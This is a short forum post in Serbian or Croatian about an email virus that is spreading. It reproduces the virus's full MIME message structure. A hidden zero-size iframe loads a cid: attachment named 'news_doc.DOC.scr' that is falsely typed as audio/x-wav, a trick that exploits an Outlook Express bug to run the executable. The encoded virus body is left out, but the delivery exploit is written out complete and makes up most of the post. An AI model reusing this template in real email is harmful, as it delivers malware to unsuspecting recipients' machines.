taj virus "hara" vec oko 6-7 dana i predstavlja ce veliki problem jel uspeva da "otvori" prazan prozor korisniku do kojeg stigne sa pitanjem da li da ga otvori ili sacuva ;) vrlo interesantno, a u sustini jednostavno je iskoriscen novi bug OutlookXpress-a sledi kod:
From: "Neko" <
[email protected]>
To: Neki mail <
[email protected]>
Subject: Re:
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="news_doc.DOC.scr"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
Zatim virus enkodovan ovde...
--====_ABC1234567890DEF_====
Veoma je interesantan deo gde se poziva virus, tj deo sa iframe-om.